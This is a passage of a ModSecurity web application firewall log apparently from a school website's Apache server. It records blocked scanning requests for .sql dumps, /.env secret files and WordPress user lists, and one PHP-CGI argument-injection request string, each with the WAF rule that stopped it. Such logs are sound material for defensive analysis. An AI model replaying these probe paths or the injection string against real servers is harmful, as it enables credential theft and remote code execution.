/wp_new.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --0abf6f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0abf6f5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646400018882 1569 (- - -) Stopwatch2: 1744646400018882 1569; combined=612, p1=304, p2=281, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0abf6f5a-Z-- --390e351a-A-- [14/Apr/2025:23:00:00 +0700] Z_0xANga3eJwvi_gLpJBEwAAAEc 103.236.140.4 44556 103.236.140.4 8181 --390e351a-B-- GET /migration.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --390e351a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --390e351a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646400889952 14181 (- - -) Stopwatch2: 1744646400889952 14181; combined=25111, p1=346, p2=375, p3=0, p4=0, p5=12208, sr=65, sw=0, l=0, gc=12182 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --390e351a-Z-- --b6b8694d-A-- [14/Apr/2025:23:00:01 +0700] Z_0xAdPxEtam20ggC7hGlQAAAJA 103.236.140.4 44558 103.236.140.4 8181 --b6b8694d-B-- GET /archief.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --b6b8694d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6b8694d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646401764976 2280 (- - -) Stopwatch2: 1744646401764976 2280; combined=823, p1=408, p2=386, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6b8694d-Z-- --22f69456-A-- [14/Apr/2025:23:00:02 +0700] Z_0xAtPxEtam20ggC7hGlgAAAJI 103.236.140.4 44560 103.236.140.4 8181 --22f69456-B-- GET /adminer.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --22f69456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22f69456-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646402627443 2457 (- - -) Stopwatch2: 1744646402627443 2457; combined=903, p1=423, p2=449, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22f69456-Z-- --6d59c20a-A-- [14/Apr/2025:23:00:03 +0700] Z_0xA4gxSXM4jtK9zHGOpgAAAMo 103.236.140.4 44562 103.236.140.4 8181 --6d59c20a-B-- GET /phpmyadmin.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --6d59c20a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d59c20a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646403469814 2440 (- - -) Stopwatch2: 1744646403469814 2440; combined=857, p1=433, p2=395, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d59c20a-Z-- --b6921b7d-A-- [14/Apr/2025:23:00:05 +0700] Z_0xBdga3eJwvi_gLpJBFAAAAEQ 103.236.140.4 44564 103.236.140.4 8181 --b6921b7d-B-- GET /myadmin.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 179.43.159.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.43.159.195 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --b6921b7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6921b7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646405031944 2924 (- - -) Stopwatch2: 1744646405031944 2924; combined=1010, p1=491, p2=487, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6921b7d-Z-- --be815665-A-- [15/Apr/2025:00:10:08 +0700] Z_1BcNPxEtam20ggC7hGqwAAAIU 103.236.140.4 44978 103.236.140.4 8181 --be815665-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.174.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --be815665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be815665-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744650608655985 522 (- - -) Stopwatch2: 1744650608655985 522; combined=179, p1=160, p2=0, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be815665-Z-- --b148e62d-A-- [15/Apr/2025:00:45:58 +0700] Z_1J1tPxEtam20ggC7hGuQAAAI0 103.236.140.4 45230 103.236.140.4 8181 --b148e62d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.193.155.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.193.155.185 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b148e62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b148e62d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744652758094994 3051 (- - -) Stopwatch2: 1744652758094994 3051; combined=1309, p1=439, p2=842, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b148e62d-Z-- --1b896d55-A-- [15/Apr/2025:01:08:38 +0700] Z_1PJlpzfFgMsbYwm2Kh5wAAAA0 103.236.140.4 45954 103.236.140.4 8181 --1b896d55-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --1b896d55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b896d55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744654118055320 874 (- - -) Stopwatch2: 1744654118055320 874; combined=381, p1=348, p2=0, p3=0, p4=0, p5=32, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b896d55-Z-- --46b04a25-A-- [15/Apr/2025:01:35:04 +0700] Z_1VWNga3eJwvi_gLpJC2wAAAEg 103.236.140.4 52190 103.236.140.4 8181 --46b04a25-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --46b04a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b04a25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744655704906079 696 (- - -) Stopwatch2: 1744655704906079 696; combined=279, p1=244, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b04a25-Z-- --b7839631-A-- [15/Apr/2025:01:56:24 +0700] Z_1aWIgxSXM4jtK9zHGP8wAAAMU 103.236.140.4 52294 103.236.140.4 8181 --b7839631-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.67.143 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --b7839631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7839631-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744656984835492 898 (- - -) Stopwatch2: 1744656984835492 898; combined=353, p1=303, p2=0, p3=0, p4=0, p5=50, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7839631-Z-- --ed40f47e-A-- [15/Apr/2025:02:15:07 +0700] Z_1eu9PxEtam20ggC7hIXwAAAIY 103.236.140.4 52922 103.236.140.4 8181 --ed40f47e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ed40f47e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed40f47e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744658107477332 848 (- - -) Stopwatch2: 1744658107477332 848; combined=314, p1=277, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed40f47e-Z-- --14c65c76-A-- [15/Apr/2025:02:30:24 +0700] Z_1iUFpzfFgMsbYwm2KkWwAAABg 103.236.140.4 53088 103.236.140.4 8181 --14c65c76-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --14c65c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14c65c76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744659024337885 860 (- - -) Stopwatch2: 1744659024337885 860; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14c65c76-Z-- --a098d354-A-- [15/Apr/2025:02:41:56 +0700] Z_1lBFpzfFgMsbYwm2KkZgAAABU 103.236.140.4 53164 103.236.140.4 8181 --a098d354-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72 Accept-Charset: utf-8 --a098d354-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a098d354-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744659716960278 859 (- - -) Stopwatch2: 1744659716960278 859; combined=336, p1=300, p2=0, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a098d354-Z-- --4c983a1c-A-- [15/Apr/2025:04:51:42 +0700] Z_2Dbs-f7AifS1fst95zEwAAAAI 103.236.140.4 60158 103.236.140.4 8181 --4c983a1c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.217.111 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.217.111 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4c983a1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c983a1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744667502397526 773 (- - -) Stopwatch2: 1744667502397526 773; combined=301, p1=269, p2=0, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c983a1c-Z-- --3925c57e-A-- [15/Apr/2025:05:24:11 +0700] Z_2LC8-f7AifS1fst95zGgAAABE 103.236.140.4 60218 103.236.140.4 8181 --3925c57e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.141.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.141.38 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.25.1 Accept: */* Content-Type: application/x-www-form-urlencoded --3925c57e-C-- --3925c57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3925c57e-E-- --3925c57e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744669451610642 4516 (- - -) Stopwatch2: 1744669451610642 4516; combined=2760, p1=504, p2=2226, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3925c57e-Z-- --1c053c2d-A-- [15/Apr/2025:05:54:50 +0700] Z_2SOs-f7AifS1fst95zHwAAAAE 103.236.140.4 60286 103.236.140.4 8181 --1c053c2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: SuperBot/4.4.0.60 (Windows XP) Accept-Charset: utf-8 --1c053c2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c053c2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744671290049886 837 (- - -) Stopwatch2: 1744671290049886 837; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c053c2d-Z-- --71d5fe23-A-- [15/Apr/2025:07:13:15 +0700] Z_2km6XLWI2MDahumW9riQAAANc 103.236.140.4 60524 103.236.140.4 8181 --71d5fe23-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 OPR/48.1.2331.132804 Accept-Charset: utf-8 --71d5fe23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71d5fe23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744675995569601 905 (- - -) Stopwatch2: 1744675995569601 905; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71d5fe23-Z-- --d0327055-A-- [15/Apr/2025:08:51:36 +0700] Z_27qCULYKh39tLgM0CFzQAAAEE 103.236.140.4 41558 103.236.140.4 8181 --d0327055-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d0327055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0327055-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file 